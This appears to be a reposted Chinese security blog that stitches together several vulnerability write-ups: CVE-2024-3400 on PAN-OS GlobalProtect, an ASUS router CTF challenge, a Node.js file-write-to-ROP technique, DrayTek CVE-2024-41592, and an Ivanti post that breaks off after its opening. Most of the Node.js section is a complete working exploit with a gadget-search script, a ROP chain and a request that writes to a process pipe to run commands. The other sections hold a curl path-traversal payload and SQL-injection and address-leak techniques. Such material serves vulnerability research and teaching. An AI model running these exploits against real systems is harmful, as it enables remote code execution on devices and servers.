#3  0x0000000000af606a in main.(*GpTask).initHttp (t=0xc00725eb00, r=0xc00260f400, ~r1=...)
at /opt/build/bamboo-agent-home-3/xml-data/build-dir/LA-GPSVC131-JOB1/build/src/apps/pan_gpsvc_task.go:442
#4  0x0000000000afd0a9 in main.(*GpTask).RunHttp (t=0xc00725eb00, w=..., r=0xc00260f400, ~r2=false)
at /opt/build/bamboo-agent-home-3/xml-data/build-dir/LA-GPSVC131-JOB1/build/src/apps/pan_gpsvc_task.go:802
#5  0x0000000000b10b48 in main.(*GpTaskMgmt).MainHttpEntry (tm=0xc000870000, w=..., r=0xc00260f300)
at /opt/build/bamboo-agent-home-3/xml-data/build-dir/LA-GPSVC131-JOB1/build/src/apps/pan_gpsvc_taskmgmt.go:450
#6  0x0000000000b3aadd in main.(*GpTaskMgmt).MainHttpEntry-fm (w=..., r=0xc00260f300)
at /opt/build/bamboo-agent-home-3/xml-data/build-dir/LA-GPSVC131-JOB1/build/src/apps/pan_gpsvc_taskmgmt.go:406
#7  0x0000000000867f74 in net/http.HandlerFunc.ServeHTTP (f={void (net/http.ResponseWriter, net/http.Request *)} 0xc00c2077a8, w=..., r=0xc00260f300)
at /usr/local/go/src/net/http/server.go:2036
#8  0x0000000000a78e56 in github.com/gorilla/mux.(*Router).ServeHTTP (r=0xc0006c20c0, w=..., req=0xc00260f300)
at /opt/build/bamboo-agent-home-3/xml-data/build-dir/LA-GPSVC131-JOB1/build/src/3p/pkg/mod/github.com/gorilla/mux@v1.7.4/mux.go:210
#9  0x000000000086c7df in net/http.serverHandler.ServeHTTP (sh=..., rw=..., req=0xc00260f100) at /usr/local/go/src/net/http/server.go:2831
#10 0x0000000000866f1a in net/http.(*conn).serve (c=0xc0081981e0, ctx=...) at /usr/local/go/src/net/http/server.go:1919
#11 0x0000000000467411 in runtime.goexit () at /usr/local/go/src/runtime/asm_amd64.s:1357
#12 0x000000c0081981e0 in ?? ()
#13 0x0000000000d79060 in ?? ()
#14 0x000000c00c150680 in ?? ()
#15 0x0000000000000000 in ?? ()
(gdb)

此时可以看到 $rdi->array 存储了我们的 payload 的相关字符： session_/../../../tmp/hacked，我们单步走一步走到调用main_loadSessFile 函数的位置

(分析到这，我突然反应过来他是golang 是旧版本的 api 调用，搜了下字符串可以知道他的 golang 版本是 1.13.15)

1	.rodata:0000000000C956F6 aGo11315 db 'go1.13.15'

可以看到 /../ 相关字符被path_filepath_Join函数处理后已经被去除了，问题来了，是在哪创建的的文件呢？

我们找到 syscall_Open 函数，对其进行引用查找，找到一条这样的调用链

1	main_loadSessFile->main_fileLock->syscall_Open

而此时 main_loadSessFile 的参数就是我们想要创建的文件

open 的定义为 int open(const char *pathname, int flags, mode_t mode); 第二个参数是个 flags，当值为 0x40 的时候为 O_CREAT

O_CREAT 定义位于 fcntl.h 文件中，可以在 linux 的内核代码^[4]中看到,

#define O_ACCMODE	00000003
#define O_RDONLY	00000000
#define O_WRONLY	00000001
#define O_RDWR		00000002
#ifndef O_CREAT
#define O_CREAT		00000100	/* not fcntl */

O_CREAT 的值通常是 0100，这是一个八进制表示的值，等同于十进制的 64 ，十六进制的 0x40，通过查找相关资料^[5]

发现只有文件不存在的时候才会创建文件。

例如使用如下 payload 尝试创建 /etc/passwd 的时候

curl -i -s -k -X $'POST' \
-H $'Host: 127.0.0.1' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 158' \
-b $'SESSID=/../../../etc/passwd' \
--data-binary $'user=watchTowr&portal=watchTowr&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=watchTowr&computer=watchTowr&client-ip=watchTowr&client-ipv6=watchTowr&md5-sum=watchTowr&gwHipReportCheck=watchTowr' \
$'https://192.168.1.101/ssl-vpn/hipreport.esp'

可以看到 open 是返回了 0

这个漏洞会创建一个任意路径、文件名可控的文件（不能覆盖文件）。那么攻击者是如何将这么一个漏洞再组合成一个命令执行的呢？这就得提到 telemetry 功能了

telemetry 命令文件分析

根据官网 ^[5] 的介绍，该功能是一个定时发送数据到远端的一个功能, 在环境搭建提到的该功能开启需要一个设备证书，我目前的复现环境是不支持的。只能分析分析功能了

在 /etc/cron.d 可以看到很多和 telemetry 相关的定时任务

其中 /usr/local/bin/dt_send 看起来是用来发送数据的

该程序由 python 编写，可以看到简单判断了下功能是不是开启，然后调用 check_and_send 函数

check_and_send 函数会接着调用 send_file_dirs_all

可以看到 send_file_dirs_all 函数会遍历 DEFAULT_DEVTELEM_OUTPUT_DIR 下的文件，然后再调用 send_file_dir

而在 send_file_dir 函数中，用 send_file 函数

在 send_file 函数中，会将文件名拼接到 send_file_cmd 遍历中

接着调用 cmd_status = techsupport.dosys(send_file_cmd, None) ，运行 dt_curl 命令，该命令也是一个 python 程序，

dt_curl 里会调用 send_file 函数

在该函数中就拼接命令，使用 pansys(curl_cmd, shell=True, timeout=250) 函数调用，注意这里的 shell=True

这里最后调用到 /opt/plugins/2.0/python-lib/pan/pansys/pansys.py 文件中的 dosys

可以看到这里的shell参数默认是 False 的但是由于send_file 调用的是传递进来设置了成了 True, 因此可以命令注入。

Diff Patch

新增了个 seesion 检查函数？

从日志可以可以看到似乎加了检查 {"level":"error","task":"3-22","time":"2024-04-20T06:28:12.18264473-07:00","message":"ArgFilterCheck: authcookie input is invalid"}

刚好也是这个补丁加的样子，从编译路径来看

(gdb) bt
#0  main.(*GpTask).ArgFilterCheck (t=0xc000093080, filterName=..., argName=..., value=..., ~r3=9)
at /opt/build/workspace/NOMAD/89c94875/workspace/ations_gpsvc_hotfix_10.2.9-hf-ga/src/apps/pan_gpsvc_task.go:615
#1  0x0000000000afb593 in main.(*GpTask).ArgFilterCheckUser (t=0xc000093080, value=..., ~r1=0)

修复了 shell=True 的问题

思考

一个空文件创建到命令执行，想必这个攻击者估计找这个功能了找了不少时间吧，此外该漏洞的利用目前需要开启telemetry 功能，那么是否还有可以利用这个空文件创建的地方呢？这么大的一个系统也许还有吧，有时间可以在仔细看看

Reference link

1.CVE-2024-3400 https://security.paloaltonetworks.com/CVE-2024-3400↩
2.palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400 https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/↩
3.Larryxi blog https://aslr.io/about/↩
4.fcntl.h#24 https://elixir.bootlin.com/linux/latest/source/include/uapi/asm-generic/fcntl.h#L24↩
5.device-telemetry-overview https://docs.paloaltonetworks.com/pan-os/11-0/pan-os-admin/device-telemetry/device-telemetry-overview↩

Real World CTF 6th Router4 writeup

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

Real World CTF 6th Router4 writeup

Swing

2024-05-30

Writeup

ASUS, CVE-2024-3079, CVE-2024-3080

…

前言

这次 RWCTF 就准备了一个题目: 「Router4」, 一共有三个队伍在比赛期间做了出来，题目的附件和题目介绍可以从Real-World-CTF-6th-Challenges^[1]这个仓库看到。

题目的场景就是一个 ASUS 路由器开放了 wan 的服务后（ lighttpd），该服务会默认监听在 443 端口上。题目环境是以 ASUS RT-AC68U的固件版本为 3.0.0.4.386.51665为基底进行模拟的。

在比赛结束后，我将涉及的漏洞上报给了 ASUS 官方，然后获得了两个 CVE 编号，分别是CVE-2024-3079和CVE-2024-3080。同时也将部分非预期的情况告诉选手，让选手也提前将非预期的漏洞上报给官方。

漏洞细节

Stack Overflow

在 ASUS 的 lighttpd 上其实是存在多个缓冲区溢出漏洞的，这里列举几个比赛前和比赛后发现的。

lighttpd cookie 处栈溢出，直接通过 strncpy 拼接 cookie的值，其中 tmp-used 就是 cookie 值的长度

mod_aicloud_auth.so 解析 uri 处栈溢出，直接从 ? 后取字符串，然后也是通过 strncpy拼接字符串，长度可控

replace_str 函数栈溢出

replace_str 函数中没有检查长度，直接通过 sprintf 写入 buffer 中，因此可以造成栈溢出

char *replace_str(char *st, char *orig, char *repl, char* buff){
char *ch;
if (!(ch = strstr(st, orig)))
return st;
strncpy(buff, st, ch-st);
buff[ch-st] = 0;
sprintf(buff+(ch-st), "%s%s", repl, ch+strlen(orig));

return buff;
}

通过查看调用链，可以看到 change_webdav_file_path 调用了 replace_str 函数

从 mod_webdav.so 的二进制看就是， sub_7e60 函数传入了 buffer 这个参数，

然后在 sub_7e60 函数中调用了 replace_str 函数，我们已经知道 replace_str 函数是直接通过 sprintf拼接字符串，没有检查，因此存在栈溢出

Infor Leak

其实预期解应该是选手还需要通过某个漏洞在实现泄漏 libc 信息，但是实际上发现解决题目的其中两个队伍 BlueWater和 Kalmarunionen都用了爆破 libc的方法（因为32位，只有4096的随机概率)，失误了 orz

在固件的逆向和代码审计的过程中，我们发现一个 sql 注入的存在，后面在上报漏洞给官方的时候才知道这个漏洞其实是之前就有人上报过了，编号为 CVE-2023-35720^[2]

在 mod_webdav.so 中，程序会从 HTTP 消息的 Header根据关键词取值，

例如从 header 中取出 Keyword ，之后在 2186 行处有一次判断值是否合法的代码，如果值不合法则HTTP返回 207

这里判断了是否为空、是否存在 ' 单引号，如果合法后续会拼接到 sql 语句中执行。

这里我们注意到一个地方，在拼接之前会进行一次 urldecode，此时我们显然很容易就会发现问题所在了，我们可以通过 url 编码来绕过程序对 '单引号的检查，在后续拼接 sql 语句来达到 sql 注入的效果。

另外一个问题来了，我们这个标题不是说信息泄漏吗？sql注入怎么达到信息泄漏呢？该组件sql数据库使用的是 sqlite3，在 sqlite3 中有一个可以用来地址泄漏的方法, 在2017年长亭的特性还是漏洞？滥用 SQLite 分词器) ^[3]文章中有详细说明。

我们直接诶引用下原文说明下原理，SQLite3 中注册自定义分词器用到的函数是 fts3_tokenizer，实现代码位于 ext/fts3/fts3_tokenizer.c 的 scalarFunc 函数。支持两种调用方式：

1 2	SELECT fts3_tokenizer(<tokenizer-name>); SELECT fts3_tokenizer(<tokenizer-name>, <sqlite3_tokenizer_module ptr>);

当只提供一个参数的时候，该函数返回指定名字的分词器的 sqlite3_tokenizer_module 结构体指针，以 blob 类型表示。例如在 sqlite3 控制台中输入：

1	sqlite> select hex(fts3_tokenizer('simple'));

将会返回一个以大端序 16 进制表示的内存地址，可以用来检查特定名称的分词器是否已注册。这个指针指向一个 sqlite3_tokenizer_module 结构体。

函数的第二个可选参数用以注册新的分词器，只要执行如下 SQL 查询，即可注册一个名为 mytokenizer 的分词器：

1	sqlite> select fts3_tokenizer('mytokenizer', x'0xdeadbeefdeadbeef');

根据文章 2.1 基地址泄漏 小节中说明的，只提供一个参数执行 select fts3_tokenizer(name)，如果 name 是一个已经注册过的分词器，将会返回这个分词器对应的内存地址。在 fts3.c 中可以看到 SQLite3 默认注册了内置分词器 simple 和 porter：

1 2	if( sqlite3Fts2HashInsert(pHash, "simple", 7, (void )pSimple) \|\| sqlite3Fts2HashInsert(pHash, "porter", 7, (void )pPorter)

以 simple 分词器为例，其注册的指针指向静态区的 simpleTokenizerModule。

static const sqlite3_tokenizer_module simpleTokenizerModule = {
0,
simpleCreate,
simpleDestroy,
simpleOpen,
simpleClose,
simpleNext,
};

通过获得这个指针，即可通过简单的计算获得 libsqlite3.so 的基地址，从而绕过 ASLR。

因此接合上面的sql注入，我们就可以拿到泄漏的地址

认证绕过

在检查路由的时候，代码如下

检查路由的时候判断是不是 /smb/ 但是忽略了，如果是 /smb 则可以绕过授权

一个好玩的非预期

前文提到了这个题目有三个队伍做出来了，其中BlueWater和 Kalmarunionen是通过栈溢出 + 爆破 libc 解决题目的，另外一个队伍用了一个比较有趣的非预期，这个队伍就是 Friendly Maltese Citizens

前面提到了该服务存在 sql 注入漏洞，他们发现 smb 的 GETMUSICCLASSIFICATION 方法存在 get_album_cover_image函数可以用来加载文件内容并且泄漏。于是他们用 sql 注入将 flag 的路径写到 album表中，然后直接通过下面的方法预览

await fetch("/RWCTF", {
"headers": {
"classify": "album",
},
"body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
"method": "GETMUSICCLASSIFICATION"
}).then(a => a.text())

参考链接

1.Router challenge attachment https://github.com/chaitin/Real-World-CTF-6th-Challenges/tree/main/Router4↩
2.CVE-2023-35720 lighttpd mod_webdav.so SQL Injection Information Disclosure Vulnerabilityhttps://www.zerodayinitiative.com/advisories/ZDI-23-1166/↩
3.特性还是漏洞？滥用 SQLite 分词器 https://blog.chaitin.cn/abusing_fts3_tokenizer/↩

Exploiting File Writes in Hardened Node.js Environments

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

Exploiting File Writes in Hardened Node.js Environments

Swing

2024-10-15

libuv, nodejs

…

TL; DR

在 Hexacon 2024 上关注到了这么一个议题《Exploiting File Writes in Hardened Environments - From HTTP Request to ROP Chain in Node.js 》，同时该作者发了一个简单的 Blog 讲述了下这个原理以及部分细节。^[1] 这里简单快速复现一下。

环境

const express = require('express');
const fs = require('fs');
const path = require('path');
const app = express();

app.use(express.json());

app.post('/upload', (req, res) => {
const { filename, content } = req.body;

if (!filename || !content) {
return res.status(400).json({ message: 'Filename and content are required!' });
}

const filePath = path.join(__dirname, 'uploads', filename);

fs.writeFile(filePath, content, (err) => {
if (err) {
return res.status(500).json({ message: 'Error saving file!' });
}
res.json({ message: 'File uploaded successfully!', path: filePath });
});
});

app.listen(3000, () => {
console.log('Server running on http://localhost:3000');
});

按照文章的描述，我们先随便构造一个可以任意文件写的 nodejs 服务（在假设环境是readonly 的情况下）

Exploit

按照文章的描述， nodejs 使用了 libuv 的这么一个库，这个库在初始化的时候会的打开一个 Pipe 管道，作者通过审计的时候发现有一个函数 uv__signal_event ^[2]

static void uv__signal_event(uv_loop_t* loop,
uv__io_t* w,
unsigned int events){
uv__signal_msg_t* msg;
uv_signal_t* handle;
char buf[sizeof(uv__signal_msg_t) * 32];
size_t bytes, end, i;
int r;

bytes = 0;
end = 0;

do {
r = read(loop->signal_pipefd[0], buf + bytes, sizeof(buf) - bytes);

if (r == -1 && errno == EINTR)
continue;
...
/* `end` is rounded down to a multiple of sizeof(uv__signal_msg_t). */
end = (bytes / sizeof(uv__signal_msg_t)) * sizeof(uv__signal_msg_t);

for (i = 0; i < end; i += sizeof(uv__signal_msg_t)) {
msg = (uv__signal_msg_t*) (buf + i);
handle = msg->handle;

if (msg->signum == handle->signum) {
assert(!(handle->flags & UV_HANDLE_CLOSING));
handle->signal_cb(handle, handle->signum); // callback
}

handle->dispatched_signals++;

if (handle->flags & UV_SIGNAL_ONE_SHOT)
uv__signal_stop(handle);
}

在这个函数中，从 loop->signal_pipefd[0] 读内容，然后做一个 signum检查，就会使用传过来的数据解引用出来一个函数指针，然后直接调用

handle = msg->handle;

if (msg->signum == handle->signum) {
assert(!(handle->flags & UV_HANDLE_CLOSING));
handle->signal_cb(handle, handle->signum); // callback
}

uv__signal_msg_t数据结构仅包含两个成员，一个句柄指针和一个称为signum的整数：

typedef struct {
uv_signal_t* handle;
int signum;
} uv__signal_msg_t;

在这个 Pipe 是可 uv__make_pipe 函数创建的，在 Docker 容器中是fd 为 11 的描述符

当然这个fd num 值更好的判断就是下一个断点，然后简单通过 echo 发点数据就能确认（不要在真实机器上测试，会把一些 lib 写坏掉）

Overview Data Structure

对于我们来说，我们有一个任意文件写入的方法，我们通过这个方法往 Pipe 中写入我们构造的数据，我们要构造的数据如上

发送过来的数据包含两个部分，一个是 *handle 指针，和 signum，其中 *handle 指针指向的数据包含两个部分

signal_cb
signum

我们要构造 uv_signal_msg_t 的 signum 和 uv_signal_s 结构体中的 signum 相等，才会调用 signal_cb ，并且，由于我们构造的这个场景是通过 fs.writeFile 函数写入内容的

用于写入文件的函数（本例中为 fs.writeFile）仅限于有效的 UTF-8 数据。因此，写入管道的所有数据都必须是有效的 UTF-8。

如果满足上述条件，我们就可以劫持程序流，控制程序执行到我们想要的地方

Searching Data Structure Gadgets

由于 FROM node:18@sha256:f910225c96b0f77b0149f350a3184568a9ba6cddba2a7c7805cc125a50591605 我们这个方式拉取的 node 程序本身是没有开PIE的

osboxes@osboxes:~$ checksec node
[*] '/home/osboxes/node'
Arch:       amd64-64-little
RELRO:      Full RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
Stripped:   No
Debuginfo:  Yes

因此我们可以尝试在 node 程序中尝试找合适的 gadget。我考虑到如果程序起来只有可能会有一些数据写在 bss 或者 data 段上，因此我 search 的范围是将程序正常启动，然后 dump memory

由于执行到 signal_cb 的时候，此时场景如下：

我们仅仅需要找几个 pop xxx , pop xxx, .* ret 的 gadget 就行，那么代码思路如下：

for addr, length in segments:
for offset in range(length-4):
handle = addr + offset
if not is_valid_utf8(p64(handle-0x60)):
continue
signum = read_mem(handle+8, 4)
if not is_valid_utf8(signum):
continue
ptr = read_mem(handle, 8)
data = read_mem(u64(ptr), 30)
if data is None:
continue
out =  disasm(data, arch='amd64', byte=False, offset=False)
if is_useful_gadget(out):
print('handle',hex(handle), '->', 'ptr:', u64(ptr), 'signum', hex(u32(signum)))
print(out)

首先从头开始遍历，由于调用的callback 指针是从 handle+60h 获取的，因此我们第一个要校验的 *handle 是要减去 0x60 的，然后从 handle + 8 后取 4个字节，作为signum ，判断这两者是否都符合 utf-8 编码，如果是将这个指针读出来，接着读取这个指针的指向的gadget ，这里假设 depth 为 30 ，然后尝试去反汇编，然后判断这个 gadget 是不是符合 pop xxx , ret 的形式，如果是将这些值打印出来。

我这里没有做更细致的处理，打印出来的 gadget 可能比较丑，大概长这样

很幸运的是，我的第一个 gadget 就是满足的，且适合我用来做栈迁移的


root@osboxes:/home/osboxes# python3 search.py
handle 0x4261af -> ptr: 12048128(0xB7D700) signum 0xb7d900
pop    r12
pop    r13
pop    r14
pop    r15
pop    rbp
ret

那么此时我构造出来的数据就大致长这样

uv_signal_msg_t.
....
*handle (0x4261af) -------->   uv_signal_s
signum (0xb7d900).               ...

*signal_cb(0xB7D700) : pop r12 ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
signum (0xb7d900)
...

1 2	content = p64(0x4261af - 0x60) # handle content += p64(0xb7d900) # signum

这里贴下我完整的 search 脚本

#!/usr/bin/env python3
from pwn import *

def is_valid_utf8(byte_seq):
try:
byte_seq.decode('utf-8')
return True
except UnicodeDecodeError:
return False


def read_mem(addr, size):
if 0x0000000000400000< addr< 0x0000000004ff1000:
base = 0x0000000000400000
data = mem1[addr-base: addr+size-base]
elif 0x00000000051f1000 < addr < 0x00000000051f4000:
base = 0x00000000051f1000
data = mem2[addr-base: addr+size-base]
elif 0x00000000051f4000 < addr < 0x000000000520f000:
base = 0x00000000051f4000
data = mem3[addr-base: addr+size-base]
else:
return None
return data

def is_useful_gadget(out):
dis_list = out.split('\n')
for n, x in enumerate(dis_list):
if x == 'ret':
for _ in range(0, n):
if 'bad' in dis_list[_] :
return False
return True
return False

with open("mem1", "rb") as f:
mem1 = f.read()

with open("mem2", "rb") as f:
mem2 = f.read()

with open("mem3", "rb") as f:
mem3 = f.read()

segments = [(0x0000000000400000, 0x0000000004ff1000-0x0000000000400000), (0x00000000051f1000, 0x00000000051f4000-0x00000000051f1000), (0x00000000051f4000, 0x000000000520f000-0x00000000051f4000)]


for addr, length in segments:
for offset in range(length-4):
handle = addr + offset
if not is_valid_utf8(p64(handle-0x60)):
continue
signum = read_mem(handle+8, 4)
if not is_valid_utf8(signum):
continue
ptr = read_mem(handle, 8)
data = read_mem(u64(ptr), 30)
if data is None:
continue
out =  disasm(data, arch='amd64', byte=False, offset=False)
if is_useful_gadget(out):
print('handle',hex(handle), '->', 'ptr:', u64(ptr), 'signum', hex(u32(signum)))
print(out)

ROP Chain

当能栈迁移后，后面就是拼接 ROP chain的流程了，由于程序本身没有 system 、 popen 等函数的调用，所以我没有法直接 ret2text，我将我的思路简单定成如下：

找到一个 gadget 能从任意地址读取值，然后赋值到某个寄存器上
找到一个gadget 能对可控的寄存器进行加减法运算
找到一个 libc 函数，该函数与 system 的偏移满足 UTF-8 编码

首先通过 ROPchain 将所有可能能用的 gadget 输出成一个文件，然后重新过滤下看哪些地址是符合 utf-8

from pwn import *
def is_valid_utf8(byte_seq):
try:
byte_seq.decode('utf-8')
return True
except UnicodeDecodeError:
return False

lines = [ line.replace('\n','') for line in open('./gadgets','r').readlines()]
lines = list(filter(lambda line: ' : ' in line , lines))
lines = list(map(lambda line: line.split(' : '),lines))


result = list(filter(lambda l: is_valid_utf8(p64(int(l[0],16))),lines ))
for i in result:
print(i[0],' : ',i[1])

通过这个过滤，我找到了两条 gadget

1 2	0x0000000001097367 : add rax, rdx ; ret 0x0000000002176b34 : mov rax, qword ptr [rsi] ; ret

第i三个 libc 函数，我找到的是， setegid ，它与system的偏移为 0xb1f30 符合 UTF-8

通过组合我们构造出如下 ropchain

content  = p64(0x4261af - 0x60) + p64(0xb7d900)
content += p64(pop_rdx_ret)
content += p64(0x100)
content += p64(add_rax_rdx_ret)
content += p64(pop_rdx_ret)
content += p64(pop_rsi_ret) # next gadget
content += p64(mov_rdi_rax_pop_rbp_jump_rdx)
content += b'aaaaaaaa' # junk data
content += p64(setegid_got) #
content += p64(mov_rax_qword_ptr_rsi_ret)
content += p64(pop_rdx_ret)
content += p64(0xb1f30) # setegid libc offset -> system
content += p64(sub_rax_rdx_ret)
content += p64(0x0000000003adace7) # jmp rax
content += b'a'*0x100 + b'; touch /tmp/hacked ; '

最后就可以执行任意命令了

完整 exploit

from pwn import *
import json
import requests
from urllib.parse import quote

# control rip
#content = p64(0x4261af - 0x60) + p64(0xb7d900) + b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'


content = p64(0x4261af - 0x60) + p64(0xb7d900) + b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'


pop_rdi_ret = 0x0000000000427748
pop_rsi_ret = 0x0000000000433d27
pop_rdx_ret = 0x0000000001634a57
sub_rax_rdx_ret = 0x00000000017e7432
mov_rax_qword_ptr_rsi_ret = 0x0000000002176b34
mov_rdi_rax_pop_rbp_jmp_rdx = 0x000000000190ade9
mov_rbp_rsp_pop_rbp_ret = 0x0000000001b1da5d

add_rax_rdx_ret = 0x0000000001097367
jump_rsp = 0x0000000000430657
mov_rdi_rax_pop_rbp_jump_rdx = 0x000000000190ade9 # mov rdi, rax ; pop rbp ; jmp rdx
mprotect_plt = 0xa98eb0
setegid_got = 0x51f3f08

content  = p64(0x4261af - 0x60) + p64(0xb7d900)
content += p64(pop_rdx_ret)
content += p64(0x100)
content += p64(add_rax_rdx_ret)
content += p64(pop_rdx_ret)
content += p64(pop_rsi_ret) # next gadget
content += p64(mov_rdi_rax_pop_rbp_jump_rdx)
content += b'aaaaaaaa' # junk data
content += p64(setegid_got) #
content += p64(mov_rax_qword_ptr_rsi_ret)
content += p64(pop_rdx_ret)
content += p64(0xb1f30) # setegid libc offset -> system
content += p64(sub_rax_rdx_ret)
content += p64(0x0000000003adace7) # jmp rax
content += b'a'*0x100 + b'; touch /tmp/hacked ; '


a = content.decode('utf-8')
print(f"content: {content}")
data = {'filename':"../../../../proc/8/fd/11","content":content.decode('utf-8')}

#print(json.dumps(data))
resp = requests.post("http://localhost:3000/upload",data = json.dumps(data),headers = {"Content-Type":"application/json"})

#data =  dump.dump_all(resp.reuqest)
#print(resp.text)

Reference link

1.https://www.sonarsource.com/blog/why-code-security-matters-even-in-hardened-environments/↩
2.https://github.com/libuv/libuv/blob/fbe2d85bd5a5c370a8cacea92b3bdfbd9f98a530/src/unix/signal.c#L433↩

CVE-2024-41592 vigor 栈溢出漏洞分析

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

CVE-2024-41592 vigor 栈溢出漏洞分析

Swing

2024-12-30

漏洞分析

CVE-2024-41592, draytek, vigor

…

TL；DR

这个漏洞其实是分析于今年11月份，鉴于今年只更新了四篇博客，所以就把这篇也拿出来了。这也是大概率今年最后一篇博客了。

CVE-2024-41592 是 forescout 一篇为《Breaking Into DrayTekRouters Before Threat Actors Do It Again》^[1]的漏洞报告其中的一个漏洞。

漏洞产生于 GetCGI() 函数中，在该函数中处理字符串参数会造成越界导致栈溢出。

漏洞分析

固件解压和调试准备

这里以Draytek 3910的 4.3.1 的版本作为调试测试版本，进行展开分析。固件的解密和解压不展开赘述，可以参考之前《HEXACON2022 - Emulate it until you make it! Pwning a DrayTek Router by Philippe Laulheret》 ^[2]slide 或者其他研究员的文章。

解压后能在 rootfs/firmware/vqemu/sohod64.bin 目录下找到主程序， Draytek 3910 采用了奇葩的 Linux + Qemu + RTOS 的奇葩架构，即在 arm linux操作系统上使用qemu 运行 drayos 的RTOS 操作系统。这里的调试方式采用的是使用编译 Draytek 开源的qemu代码进行编译，然后就可以正常调试。

调试之前需要对 firmware/setup_qemu_linux.sh 和 run_linux.sh 进行部分修改，例如对run_linux.sh 在 qemu-system-aarch64 添加 -s 参数方便用于调试

漏洞成因

我们通过一个有符号的 draytek 2830 的固件来快速定位到Draytek 3910 4.3.1的 GetCGI() 函数，或者直接对 QUERY_STRING 字符串进行交叉引用。

在各个 cgi 处理函数的时候都会进行一次 GetCGI 函数的调用来处理参数。

在这个函数（GetCGI）里面，当有 & 出现，就会通过 makeword 函数生成一个内存空间，然后将地址赋值到栈上，这个函数的部分逻辑伪代码如下：

v19 = sub_400BFA18("REQUEST_METHOD", a3);
if ( v19 )
{
if ( !strcmp(v19, "GET") )
{
v18 = sub_400BFA18("QUERY_STRING", a3);
if ( !v18 )
return 0;
idx = 0;
while ( *v18 )
{
*(a2 + 8 * idx) = makeword(v18, '&');   // overflow
plustospace(*(a2 + 8 * idx));
unescape_url(*(a2 + 8 * idx));
v16 = safe_strcrh(*(a2 + 8 * idx), '=');
if ( v16 )
{
*v16 = 0;
*(a2 + 8 * idx + 4LL) = v16 + 1;
}
else
{
*(a2 + 8 * idx + 4LL) = 0;
}
++idx;
}
}

这里的 (a2 + 8 * idx） 在栈上，当输入过多的 & 就有如下的效果：

会有一堆指针覆盖栈上的变量，甚至能覆盖到返回地址。

Exploit

虽然我们在GetCGI() 函数中覆盖到了返回地址，但是在各个 CGI 函数结尾的时候会有一个 FreeCtrlName 函数的调用，该函数会将将覆盖掉得返回地址的指针置零。

也正如原文章所说的，我们需要绕过这个函数

Although this seems straightforward, challenges exist. Consider the “FreeCtrlName()” function called when a
CGI handler returns (Figure 13). This function “frees” all the POST/GET request data structures, including the
query string buffer. It simply iterates over the 32-bit pointers located in the lower 4 bytes of the stack
21
DRAY:BREAK - BREAKING INTO DRAYTEK ROUTERS BEFORE THREAT ACTORS DO IT AGAIN
addresses and frees them, zeroing out the pointer values as well. Oddly, the higher 4-byte addresses (e.g.,
pointers to query string parameters values) are never freed

FreeCtrlName 函数伪代码如下：

__int64 __fastcall FreeCtrlName(__int64 result)
{
int v1; // [xsp+1Ch] [xbp+1Ch]
int i; // [xsp+2Ch] [xbp+2Ch]

v1 = result;
for ( i = 0; *(v1 + 8 * i); ++i )
{
result = sub_4061D7CC(*(v1 + 8 * i), 0x154u);
*(v1 + 8 * i) = 0;
}
return result;
}

这个函数的 free 逻辑是，遍历栈上的指针，一直free 直到为 0 为止，因此我们需要找到一个函数可以在栈上写一个 0 ，这样就能避免这个问题。在原文^[1] 甚至后来 12月在 Blackhat EU 《When (Remote) Shells Fall Into The Same Hole: Rooting DrayTekRouters Before Attackers Can Do It Again》^[3]的slide 上都没有提及这个所谓的 [vulnerable-cgi-page].cgi 是什么。

但是通过一些途径我们还是能找到这个能设置 0 的 cgi ，思路也是比较简单

首先先将所有的 CGI 调用函数定义出来，
过滤出不需要授权的 CGI 函数
粗浅的记得是只要函数里没有 CGIbyFieldName = GetCGIbyFieldName(v6 + 32, "sFormAuthStr");的调用就不需要授权
猜想哪些函数可以写 0 ，例如 atoi(query_string), query_string 是 HTTP 请求传入的参数

通过以上操作，我们其实很快就能找到一个不用授权、且参数可控可写 0 的CGI。最后的效果就是我们可以控制返回地址跳转到一个内容完全可控的地址里（内容为具体参数的内容）且由于程序运行在 qemu 环境上，因此我们可以在目标地址上写入任意的shellcode。但是我们需要逃逸到 qemu 外面，本身程序提供了一个， virtcons_out 这个函数，可以执行一些特殊的命令，我们可以在第一个参数中拼接命令注入来在host上执行任意命令。

Reference link

1.《Breaking Into DrayTekRouters Before Threat Actors Do It Again》https://www.forescout.com/resources/draybreak-draytek-research/↩
2.《HEXACON2022 - Emulate it until you make it! Pwning a DrayTek Router by Philippe Laulheret》https://www.youtube.com/watch?v=CD8HfjdDeuM↩
3.《When (Remote) Shells Fall Into The Same Hole: Rooting DrayTekRouters Before Attackers Can Do It Again》 https://i.blackhat.com/EU-24/Presentations/EU24-Dashevskyi-When-Remote-Shells-Fall-Into-The-Same-Hole.pdf↩

CVE-2025-0282 Ivanti Connect Secure VPN 栈溢出漏洞分析

作者: 纯情
时间: 2026-01-20
分类: 资讯
评论

CVE-2025-0282 Ivanti Connect Secure VPN 栈溢出漏洞分析

Swing

2025-01-29

漏洞分析

CVE-2025-0282, pulse, vpn

…

TL; DR

2025年（暨蛇年）第一篇博客文章，顺便祝我的博客读者新春快乐吧。

1月9日 google 发布的 Ivanti Connect Secure VPN 设备的在野漏洞预警：

